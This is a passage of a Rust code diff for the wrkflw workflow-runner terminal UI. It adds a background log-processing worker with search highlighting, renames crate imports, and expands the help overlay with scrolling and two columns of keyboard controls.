Self::worker_loop(request_rx, response_tx);
|
||||
});
|
||||
|
||||
Self {
|
||||
request_tx,
|
||||
response_rx,
|
||||
_worker_handle: worker_handle,
|
||||
}
|
||||
}
|
||||
|
||||
/// Send a processing request (non-blocking)
|
||||
pub fn request_update(
|
||||
&self,
|
||||
request: LogProcessingRequest,
|
||||
) -> Result<(), mpsc::SendError<LogProcessingRequest>> {
|
||||
self.request_tx.send(request)
|
||||
}
|
||||
|
||||
/// Try to get the latest processed logs (non-blocking)
|
||||
pub fn try_get_update(&self) -> Option<LogProcessingResponse> {
|
||||
self.response_rx.try_recv().ok()
|
||||
}
|
||||
|
||||
/// Background worker loop
|
||||
fn worker_loop(
|
||||
request_rx: mpsc::Receiver<LogProcessingRequest>,
|
||||
response_tx: mpsc::Sender<LogProcessingResponse>,
|
||||
) {
|
||||
let mut last_request: Option<LogProcessingRequest> = None;
|
||||
let mut last_processed_time = Instant::now();
|
||||
let mut cached_logs: Vec<String> = Vec::new();
|
||||
let mut cached_app_logs_count = 0;
|
||||
let mut cached_system_logs_count = 0;
|
||||
|
||||
loop {
|
||||
// Check for new requests with a timeout to allow periodic processing
|
||||
let request = match request_rx.recv_timeout(Duration::from_millis(100)) {
|
||||
Ok(req) => Some(req),
|
||||
Err(mpsc::RecvTimeoutError::Timeout) => None,
|
||||
Err(mpsc::RecvTimeoutError::Disconnected) => break,
|
||||
};
|
||||
|
||||
// Update request if we received one
|
||||
if let Some(req) = request {
|
||||
last_request = Some(req);
|
||||
}
|
||||
|
||||
// Process if we have a request and enough time has passed since last processing
|
||||
if let Some(ref req) = last_request {
|
||||
let should_process = last_processed_time.elapsed() > Duration::from_millis(50)
|
||||
&& (cached_app_logs_count != req.app_logs_count
|
||||
|| cached_system_logs_count != req.system_logs_count
|
||||
|| cached_logs.is_empty());
|
||||
|
||||
if should_process {
|
||||
// Refresh log cache if log counts changed
|
||||
if cached_app_logs_count != req.app_logs_count
|
||||
|| cached_system_logs_count != req.system_logs_count
|
||||
|| cached_logs.is_empty()
|
||||
{
|
||||
cached_logs = Self::get_combined_logs(&req.app_logs);
|
||||
cached_app_logs_count = req.app_logs_count;
|
||||
cached_system_logs_count = req.system_logs_count;
|
||||
}
|
||||
|
||||
let response = Self::process_logs(&cached_logs, req);
|
||||
|
||||
if response_tx.send(response).is_err() {
|
||||
break; // Receiver disconnected
|
||||
}
|
||||
|
||||
last_processed_time = Instant::now();
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Get combined app and system logs
|
||||
fn get_combined_logs(app_logs: &[String]) -> Vec<String> {
|
||||
let mut all_logs = Vec::new();
|
||||
|
||||
// Add app logs
|
||||
for log in app_logs {
|
||||
all_logs.push(log.clone());
|
||||
}
|
||||
|
||||
// Add system logs
|
||||
for log in wrkflw_logging::get_logs() {
|
||||
all_logs.push(log.clone());
|
||||
}
|
||||
|
||||
all_logs
|
||||
}
|
||||
|
||||
/// Process logs according to search and filter criteria
|
||||
fn process_logs(all_logs: &[String], request: &LogProcessingRequest) -> LogProcessingResponse {
|
||||
// Filter logs based on search query and filter level
|
||||
let mut filtered_logs = Vec::new();
|
||||
let mut search_matches = Vec::new();
|
||||
|
||||
for (idx, log) in all_logs.iter().enumerate() {
|
||||
let passes_filter = match &request.filter_level {
|
||||
None => true,
|
||||
Some(level) => level.matches(log),
|
||||
};
|
||||
|
||||
let matches_search = if request.search_query.is_empty() {
|
||||
true
|
||||
} else {
|
||||
log.to_lowercase()
|
||||
.contains(&request.search_query.to_lowercase())
|
||||
};
|
||||
|
||||
if passes_filter && matches_search {
|
||||
filtered_logs.push((idx, log));
|
||||
if matches_search && !request.search_query.is_empty() {
|
||||
search_matches.push(filtered_logs.len() - 1);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Process filtered logs into display format
|
||||
let processed_logs: Vec<ProcessedLogEntry> = filtered_logs
|
||||
.iter()
|
||||
.map(|(_, log_line)| Self::process_log_entry(log_line, &request.search_query))
|
||||
.collect();
|
||||
|
||||
LogProcessingResponse {
|
||||
processed_logs,
|
||||
total_log_count: all_logs.len(),
|
||||
filtered_count: filtered_logs.len(),
|
||||
search_matches,
|
||||
}
|
||||
}
|
||||
|
||||
/// Process a single log entry into display format
|
||||
fn process_log_entry(log_line: &str, search_query: &str) -> ProcessedLogEntry {
|
||||
// Extract timestamp from log format [HH:MM:SS]
|
||||
let timestamp = if log_line.starts_with('[') && log_line.contains(']') {
|
||||
let end = log_line.find(']').unwrap_or(0);
|
||||
if end > 1 {
|
||||
log_line[1..end].to_string()
|
||||
} else {
|
||||
"??:??:??".to_string()
|
||||
}
|
||||
} else {
|
||||
"??:??:??".to_string()
|
||||
};
|
||||
|
||||
// Determine log type and style
|
||||
let (log_type, log_style) =
|
||||
if log_line.contains("Error") || log_line.contains("error") || log_line.contains("❌")
|
||||
{
|
||||
("ERROR", Style::default().fg(Color::Red))
|
||||
} else if log_line.contains("Warning")
|
||||
|| log_line.contains("warning")
|
||||
|| log_line.contains("⚠️")
|
||||
{
|
||||
("WARN", Style::default().fg(Color::Yellow))
|
||||
} else if log_line.contains("Success")
|
||||
|| log_line.contains("success")
|
||||
|| log_line.contains("✅")
|
||||
{
|
||||
("SUCCESS", Style::default().fg(Color::Green))
|
||||
} else if log_line.contains("Running")
|
||||
|| log_line.contains("running")
|
||||
|| log_line.contains("⟳")
|
||||
{
|
||||
("INFO", Style::default().fg(Color::Cyan))
|
||||
} else if log_line.contains("Triggering") || log_line.contains("triggered") {
|
||||
("TRIG", Style::default().fg(Color::Magenta))
|
||||
} else {
|
||||
("INFO", Style::default().fg(Color::Gray))
|
||||
};
|
||||
|
||||
// Extract content after timestamp
|
||||
let content = if log_line.starts_with('[') && log_line.contains(']') {
|
||||
let start = log_line.find(']').unwrap_or(0) + 1;
|
||||
log_line[start..].trim()
|
||||
} else {
|
||||
log_line
|
||||
};
|
||||
|
||||
// Create content spans with search highlighting
|
||||
let content_spans = if !search_query.is_empty() {
|
||||
Self::highlight_search_matches(content, search_query)
|
||||
} else {
|
||||
vec![Span::raw(content.to_string())]
|
||||
};
|
||||
|
||||
ProcessedLogEntry {
|
||||
timestamp,
|
||||
log_type: log_type.to_string(),
|
||||
log_style,
|
||||
content_spans,
|
||||
}
|
||||
}
|
||||
|
||||
/// Highlight search matches in content
|
||||
fn highlight_search_matches(content: &str, search_query: &str) -> Vec<Span<'static>> {
|
||||
let mut spans = Vec::new();
|
||||
let lowercase_content = content.to_lowercase();
|
||||
let lowercase_query = search_query.to_lowercase();
|
||||
|
||||
if lowercase_content.contains(&lowercase_query) {
|
||||
let mut last_idx = 0;
|
||||
while let Some(idx) = lowercase_content[last_idx..].find(&lowercase_query) {
|
||||
let real_idx = last_idx + idx;
|
||||
|
||||
// Add text before match
|
||||
if real_idx > last_idx {
|
||||
spans.push(Span::raw(content[last_idx..real_idx].to_string()));
|
||||
}
|
||||
|
||||
// Add matched text with highlight
|
||||
let match_end = real_idx + search_query.len();
|
||||
spans.push(Span::styled(
|
||||
content[real_idx..match_end].to_string(),
|
||||
Style::default().bg(Color::Yellow).fg(Color::Black),
|
||||
));
|
||||
|
||||
last_idx = match_end;
|
||||
}
|
||||
|
||||
// Add remaining text after last match
|
||||
if last_idx < content.len() {
|
||||
spans.push(Span::raw(content[last_idx..].to_string()));
|
||||
}
|
||||
} else {
|
||||
spans.push(Span::raw(content.to_string()));
|
||||
}
|
||||
|
||||
spans
|
||||
}
|
||||
}
|
||||
|
||||
impl Default for LogProcessor {
|
||||
fn default() -> Self {
|
||||
Self::new()
|
||||
}
|
||||
}
|
||||
@@ -1,10 +1,10 @@
|
||||
// UI Models for wrkflw
|
||||
use chrono::Local;
|
||||
use executor::{JobStatus, StepStatus};
|
||||
use std::path::PathBuf;
|
||||
use wrkflw_executor::{JobStatus, StepStatus};
|
||||
|
||||
/// Type alias for the complex execution result type
|
||||
pub type ExecutionResultMsg = (usize, Result<(Vec<executor::JobResult>, ()), String>);
|
||||
pub type ExecutionResultMsg = (usize, Result<(Vec<wrkflw_executor::JobResult>, ()), String>);
|
||||
|
||||
/// Represents an individual workflow file
|
||||
pub struct Workflow {
|
||||
@@ -50,6 +50,7 @@ pub struct StepExecution {
|
||||
}
|
||||
|
||||
/// Log filter levels
|
||||
#[derive(Debug, Clone, PartialEq)]
|
||||
pub enum LogFilterLevel {
|
||||
Info,
|
||||
Warning,
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
// UI utilities
|
||||
use crate::models::{Workflow, WorkflowStatus};
|
||||
use std::path::{Path, PathBuf};
|
||||
use utils::is_workflow_file;
|
||||
use wrkflw_utils::is_workflow_file;
|
||||
|
||||
/// Find and load all workflow files in a directory
|
||||
pub fn load_workflows(dir_path: &Path) -> Vec<Workflow> {
|
||||
|
||||
@@ -145,15 +145,17 @@ pub fn render_execution_tab(
|
||||
.iter()
|
||||
.map(|job| {
|
||||
let status_symbol = match job.status {
|
||||
executor::JobStatus::Success => "✅",
|
||||
executor::JobStatus::Failure => "❌",
|
||||
executor::JobStatus::Skipped => "⏭",
|
||||
wrkflw_executor::JobStatus::Success => "✅",
|
||||
wrkflw_executor::JobStatus::Failure => "❌",
|
||||
wrkflw_executor::JobStatus::Skipped => "⏭",
|
||||
};
|
||||
|
||||
let status_style = match job.status {
|
||||
executor::JobStatus::Success => Style::default().fg(Color::Green),
|
||||
executor::JobStatus::Failure => Style::default().fg(Color::Red),
|
||||
executor::JobStatus::Skipped => Style::default().fg(Color::Gray),
|
||||
wrkflw_executor::JobStatus::Success => {
|
||||
Style::default().fg(Color::Green)
|
||||
}
|
||||
wrkflw_executor::JobStatus::Failure => Style::default().fg(Color::Red),
|
||||
wrkflw_executor::JobStatus::Skipped => Style::default().fg(Color::Gray),
|
||||
};
|
||||
|
||||
// Count completed and total steps
|
||||
@@ -162,8 +164,8 @@ pub fn render_execution_tab(
|
||||
.steps
|
||||
.iter()
|
||||
.filter(|s| {
|
||||
s.status == executor::StepStatus::Success
|
||||
|| s.status == executor::StepStatus::Failure
|
||||
s.status == wrkflw_executor::StepStatus::Success
|
||||
|| s.status == wrkflw_executor::StepStatus::Failure
|
||||
})
|
||||
.count();
|
||||
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
// Help overlay rendering
|
||||
use ratatui::{
|
||||
backend::CrosstermBackend,
|
||||
layout::Rect,
|
||||
layout::{Constraint, Direction, Layout, Rect},
|
||||
style::{Color, Modifier, Style},
|
||||
text::{Line, Span},
|
||||
widgets::{Block, BorderType, Borders, Paragraph, Wrap},
|
||||
@@ -9,11 +9,22 @@ use ratatui::{
|
||||
};
|
||||
use std::io;
|
||||
|
||||
// Render the help tab
|
||||
pub fn render_help_tab(f: &mut Frame<CrosstermBackend<io::Stdout>>, area: Rect) {
|
||||
let help_text = vec![
|
||||
// Render the help tab with scroll support
|
||||
pub fn render_help_content(
|
||||
f: &mut Frame<CrosstermBackend<io::Stdout>>,
|
||||
area: Rect,
|
||||
scroll_offset: usize,
|
||||
) {
|
||||
// Split the area into columns for better organization
|
||||
let chunks = Layout::default()
|
||||
.direction(Direction::Horizontal)
|
||||
.constraints([Constraint::Percentage(50), Constraint::Percentage(50)].as_ref())
|
||||
.split(area);
|
||||
|
||||
// Left column content
|
||||
let left_help_text = vec![
|
||||
Line::from(Span::styled(
|
||||
"Keyboard Controls",
|
||||
"🗂 NAVIGATION",
|
||||
Style::default()
|
||||
.fg(Color::Cyan)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
@@ -21,35 +32,391 @@ pub fn render_help_tab(f: &mut Frame<CrosstermBackend<io::Stdout>>, area: Rect)
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"Tab",
|
||||
"Tab / Shift+Tab",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Switch between tabs"),
|
||||
]),
|
||||
// More help text would follow...
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"1-4 / w,x,l,h",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Jump to specific tab"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"↑/↓ or k/j",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Navigate lists"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"Enter",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Select/View details"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"Esc",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Back/Exit help"),
|
||||
]),
|
||||
Line::from(""),
|
||||
Line::from(Span::styled(
|
||||
"🚀 WORKFLOW MANAGEMENT",
|
||||
Style::default()
|
||||
.fg(Color::Green)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"Space",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Toggle workflow selection"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"r",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Run selected workflows"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"a",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Select all workflows"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"n",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Deselect all workflows"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"Shift+R",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Reset workflow status"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"t",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Trigger remote workflow"),
|
||||
]),
|
||||
Line::from(""),
|
||||
Line::from(Span::styled(
|
||||
"🔧 EXECUTION MODES",
|
||||
Style::default()
|
||||
.fg(Color::Magenta)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"e",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Toggle emulation mode"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"v",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Toggle validation mode"),
|
||||
]),
|
||||
Line::from(""),
|
||||
Line::from(vec![Span::styled(
|
||||
"Runtime Modes:",
|
||||
Style::default()
|
||||
.fg(Color::White)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)]),
|
||||
Line::from(vec![
|
||||
Span::raw(" • "),
|
||||
Span::styled("Docker", Style::default().fg(Color::Blue)),
|
||||
Span::raw(" - Container isolation (default)"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::raw(" • "),
|
||||
Span::styled("Podman", Style::default().fg(Color::Blue)),
|
||||
Span::raw(" - Rootless containers"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::raw(" • "),
|
||||
Span::styled("Emulation", Style::default().fg(Color::Red)),
|
||||
Span::raw(" - Process mode (UNSAFE)"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::raw(" • "),
|
||||
Span::styled("Secure Emulation", Style::default().fg(Color::Yellow)),
|
||||
Span::raw(" - Sandboxed processes"),
|
||||
]),
|
||||
];
|
||||
|
||||
let help_widget = Paragraph::new(help_text)
|
||||
// Right column content
|
||||
let right_help_text = vec![
|
||||
Line::from(Span::styled(
|
||||
"📄 LOGS & SEARCH",
|
||||
Style::default()
|
||||
.fg(Color::Blue)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"s",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Toggle log search"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"f",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Toggle log filter"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"c",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Clear search & filter"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"n",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Next search match"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"↑/↓",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Scroll logs/Navigate"),
|
||||
]),
|
||||
Line::from(""),
|
||||
Line::from(Span::styled(
|
||||
"ℹ️ TAB OVERVIEW",
|
||||
Style::default()
|
||||
.fg(Color::White)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"1. Workflows",
|
||||
Style::default()
|
||||
.fg(Color::Cyan)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Browse & select workflows"),
|
||||
]),
|
||||
Line::from(vec![Span::raw(" • View workflow files")]),
|
||||
Line::from(vec![Span::raw(" • Select multiple for batch execution")]),
|
||||
Line::from(vec![Span::raw(" • Trigger remote workflows")]),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"2. Execution",
|
||||
Style::default()
|
||||
.fg(Color::Green)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Monitor job progress"),
|
||||
]),
|
||||
Line::from(vec![Span::raw(" • View job status and details")]),
|
||||
Line::from(vec![Span::raw(" • Enter job details with Enter")]),
|
||||
Line::from(vec![Span::raw(" • Navigate step execution")]),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"3. Logs",
|
||||
Style::default()
|
||||
.fg(Color::Blue)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - View execution logs"),
|
||||
]),
|
||||
Line::from(vec![Span::raw(" • Search and filter logs")]),
|
||||
Line::from(vec![Span::raw(" • Real-time log streaming")]),
|
||||
Line::from(vec![Span::raw(" • Navigate search results")]),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"4. Help",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - This comprehensive guide"),
|
||||
]),
|
||||
Line::from(""),
|
||||
Line::from(Span::styled(
|
||||
"🎯 QUICK ACTIONS",
|
||||
Style::default().fg(Color::Red).add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"?",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Toggle help overlay"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"q",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Quit application"),
|
||||
]),
|
||||
Line::from(""),
|
||||
Line::from(Span::styled(
|
||||
"💡 TIPS",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::raw("• Use "),
|
||||
Span::styled("emulation mode", Style::default().fg(Color::Red)),
|
||||
Span::raw(" when containers"),
|
||||
]),
|
||||
Line::from(vec![Span::raw(" are unavailable or for quick testing")]),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::raw("• "),
|
||||
Span::styled("Secure emulation", Style::default().fg(Color::Yellow)),
|
||||
Span::raw(" provides sandboxing"),
|
||||
]),
|
||||
Line::from(vec![Span::raw(" for untrusted workflows")]),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::raw("• Use "),
|
||||
Span::styled("validation mode", Style::default().fg(Color::Green)),
|
||||
Span::raw(" to check"),
|
||||
]),
|
||||
Line::from(vec![Span::raw(" workflows without execution")]),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::raw("• "),
|
||||
Span::styled("Preserve containers", Style::default().fg(Color::Blue)),
|
||||
Span::raw(" on failure"),
|
||||
]),
|
||||
Line::from(vec![Span::raw(" for debugging (Docker/Podman only)")]),
|
||||
];
|
||||
|
||||
// Apply scroll offset to the content
|
||||
let left_help_text = if scroll_offset < left_help_text.len() {
|
||||
left_help_text.into_iter().skip(scroll_offset).collect()
|
||||
} else {
|
||||
vec![Line::from("")]
|
||||
};
|
||||
|
||||
let right_help_text = if scroll_offset < right_help_text.len() {
|
||||
right_help_text.into_iter().skip(scroll_offset).collect()
|
||||
} else {
|
||||
vec![Line::from("")]
|
||||
};
|
||||
|
||||
// Render left column
|
||||
let left_widget = Paragraph::new(left_help_text)
|
||||
.block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded)
|
||||
.title(Span::styled(" Help ", Style::default().fg(Color::Yellow))),
|
||||
.title(Span::styled(
|
||||
" WRKFLW Help - Controls & Features ",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
)
|
||||
.wrap(Wrap { trim: true });
|
||||
|
||||
f.render_widget(help_widget, area);
|
||||
// Render right column
|
||||
let right_widget = Paragraph::new(right_help_text)
|
||||
.block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded)
|
||||
.title(Span::styled(
|
||||
" Interface Guide & Tips ",
|
||||
Style::default()
|
||||
.fg(Color::Cyan)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
)
|
||||
.wrap(Wrap { trim: true });
|
||||
|
||||
f.render_widget(left_widget, chunks[0]);
|
||||
f.render_widget(right_widget, chunks[1]);
|
||||
}
|
||||
|
||||
// Render a help overlay
|
||||
pub fn render_help_overlay(f: &mut Frame<CrosstermBackend<io::Stdout>>) {
|
||||
pub fn render_help_overlay(f: &mut Frame<CrosstermBackend<io::Stdout>>, scroll_offset: usize) {
|
||||
let size = f.size();
|
||||
|
||||
// Create a slightly smaller centered modal
|
||||
let width = size.width.min(60);
|
||||
let height = size.height.min(20);
|
||||
// Create a larger centered modal to accommodate comprehensive help content
|
||||
let width = (size.width * 9 / 10).min(120); // Use 90% of width, max 120 chars
|
||||
let height = (size.height * 9 / 10).min(40); // Use 90% of height, max 40 lines
|
||||
let x = (size.width - width) / 2;
|
||||
let y = (size.height - height) / 2;
|
||||
|
||||
@@ -60,10 +427,32 @@ pub fn render_help_overlay(f: &mut Frame<CrosstermBackend<io::Stdout>>) {
|
||||
height,
|
||||
};
|
||||
|
||||
// Create a clear background
|
||||
// Create a semi-transparent dark background for better visibility
|
||||
let clear = Block::default().style(Style::default().bg(Color::Black));
|
||||
f.render_widget(clear, size);
|
||||
|
||||
// Render the help content
|
||||
render_help_tab(f, help_area);
|
||||
// Add a border around the entire overlay for better visual separation
|
||||
let overlay_block = Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Double)
|
||||
.style(Style::default().bg(Color::Black).fg(Color::White))
|
||||
.title(Span::styled(
|
||||
" Press ? or Esc to close help ",
|
||||
Style::default()
|
||||
.fg(Color::Gray)
|
||||
.add_modifier(Modifier::ITALIC),
|
||||
));
|
||||
|
||||
f.render_widget(overlay_block, help_area);
|
||||
|
||||
// Create inner area for content
|
||||
let inner_area = Rect {
|
||||
x: help_area.x + 1,
|
||||
y: help_area.y + 1,
|
||||
width: help_area.width.saturating_sub(2),
|
||||
height: help_area.height.saturating_sub(2),
|
||||
};
|
||||
|
||||
// Render the help content with scroll support
|
||||
render_help_content(f, inner_area, scroll_offset);
|
||||
}
|
||||
|
||||
@@ -46,15 +46,15 @@ pub fn render_job_detail_view(
|
||||
|
||||
// Job title section
|
||||
let status_text = match job.status {
|
||||
executor::JobStatus::Success => "Success",
|
||||
executor::JobStatus::Failure => "Failed",
|
||||
executor::JobStatus::Skipped => "Skipped",
|
||||
wrkflw_executor::JobStatus::Success => "Success",
|
||||
wrkflw_executor::JobStatus::Failure => "Failed",
|
||||
wrkflw_executor::JobStatus::Skipped => "Skipped",
|
||||
};
|
||||
|
||||
let status_style = match job.status {
|
||||
executor::JobStatus::Success => Style::default().fg(Color::Green),
|
||||
executor::JobStatus::Failure => Style::default().fg(Color::Red),
|
||||
executor::JobStatus::Skipped => Style::default().fg(Color::Yellow),
|
||||
wrkflw_executor::JobStatus::Success => Style::default().fg(Color::Green),
|
||||
wrkflw_executor::JobStatus::Failure => Style::default().fg(Color::Red),
|
||||
wrkflw_executor::JobStatus::Skipped => Style::default().fg(Color::Yellow),
|
||||
};
|
||||
|
||||
let job_title = Paragraph::new(vec![
|
||||
@@ -101,15 +101,19 @@ pub fn render_job_detail_view(
|
||||
|
||||
let rows = job.steps.iter().map(|step| {
|
||||
let status_symbol = match step.status {
|
||||
executor::StepStatus::Success => "✅",
|
||||
executor::StepStatus::Failure => "❌",
|
||||
executor::StepStatus::Skipped => "⏭",
|
||||
wrkflw_executor::StepStatus::Success => "✅",
|
||||
wrkflw_executor::StepStatus::Failure => "❌",
|
||||
wrkflw_executor::StepStatus::Skipped => "⏭",
|
||||
};
|
||||
|
||||
let status_style = match step.status {
|
||||
executor::StepStatus::Success => Style::default().fg(Color::Green),
|
||||
executor::StepStatus::Failure => Style::default().fg(Color::Red),
|
||||
executor::StepStatus::Skipped => Style::default().fg(Color::Gray),
|
||||
wrkflw_executor::StepStatus::Success => {
|
||||
Style::default().fg(Color::Green)
|
||||
}
|
||||
wrkflw_executor::StepStatus::Failure => Style::default().fg(Color::Red),
|
||||
wrkflw_executor::StepStatus::Skipped => {
|
||||
Style::default().fg(Color::Gray)
|
||||
}
|
||||
};
|
||||
|
||||
Row::new(vec![
|
||||
@@ -147,15 +151,21 @@ pub fn render_job_detail_view(
|
||||
|
||||
// Show step output with proper styling
|
||||
let status_text = match step.status {
|
||||
executor::StepStatus::Success => "Success",
|
||||
executor::StepStatus::Failure => "Failed",
|
||||
executor::StepStatus::Skipped => "Skipped",
|
||||
wrkflw_executor::StepStatus::Success => "Success",
|
||||
wrkflw_executor::StepStatus::Failure => "Failed",
|
||||
wrkflw_executor::StepStatus::Skipped => "Skipped",
|
||||
};
|
||||
|
||||
let status_style = match step.status {
|
||||
executor::StepStatus::Success => Style::default().fg(Color::Green),
|
||||
executor::StepStatus::Failure => Style::default().fg(Color::Red),
|
||||
executor::StepStatus::Skipped => Style::default().fg(Color::Yellow),
|
||||
wrkflw_executor::StepStatus::Success => {
|
||||
Style::default().fg(Color::Green)
|
||||
}
|
||||
wrkflw_executor::StepStatus::Failure => {
|
||||
Style::default().fg(Color::Red)
|
||||
}
|
||||
wrkflw_executor::StepStatus::Skipped => {
|
||||
Style::default().fg(Color::Yellow)
|
||||
}
|
||||
};
|
||||
|
||||
let mut output_text = step.output.clone();
|
||||
|
||||
@@ -140,45 +140,8 @@ pub fn render_logs_tab(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App, a
|
||||
f.render_widget(search_block, chunks[1]);
|
||||
}
|
||||
|
||||
// Combine application logs with system logs
|
||||
let mut all_logs = Vec::new();
|
||||
|
||||
// Now all logs should have timestamps in the format [HH:MM:SS]
|
||||
|
||||
// Process app logs
|
||||
for log in &app.logs {
|
||||
all_logs.push(log.clone());
|
||||
}
|
||||
|
||||
// Process system logs
|
||||
for log in logging::get_logs() {
|
||||
all_logs.push(log.clone());
|
||||
}
|
||||
|
||||
// Filter logs based on search query and filter level
|
||||
let filtered_logs = if !app.log_search_query.is_empty() || app.log_filter_level.is_some() {
|
||||
all_logs
|
||||
.iter()
|
||||
.filter(|log| {
|
||||
let passes_filter = match &app.log_filter_level {
|
||||
None => true,
|
||||
Some(level) => level.matches(log),
|
||||
};
|
||||
|
||||
let matches_search = if app.log_search_query.is_empty() {
|
||||
true
|
||||
} else {
|
||||
log.to_lowercase()
|
||||
